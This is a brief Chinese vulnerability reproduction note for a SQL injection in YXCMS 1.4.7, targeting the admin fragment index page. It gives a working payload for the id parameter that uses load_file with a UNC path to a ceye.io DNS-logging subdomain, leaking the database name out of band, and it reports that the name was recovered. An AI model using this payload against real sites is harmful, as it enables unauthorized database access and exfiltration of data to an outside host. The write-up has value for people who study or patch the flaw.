跳转至

YXCMS 1.4.7SQL注入

1. 影响版本

1.4.7

2.漏洞复现

url:/index.php?r=admin/fragment/index 利用ceye得到的回显 用bp抓包,修改id为

payload:

2 and if((select load_file(concat('\\',(select database()),'.36rdia.ceye.io\abc'))),2,2)

在ceye上面可以得到回显:

得到了数据库名称yxcms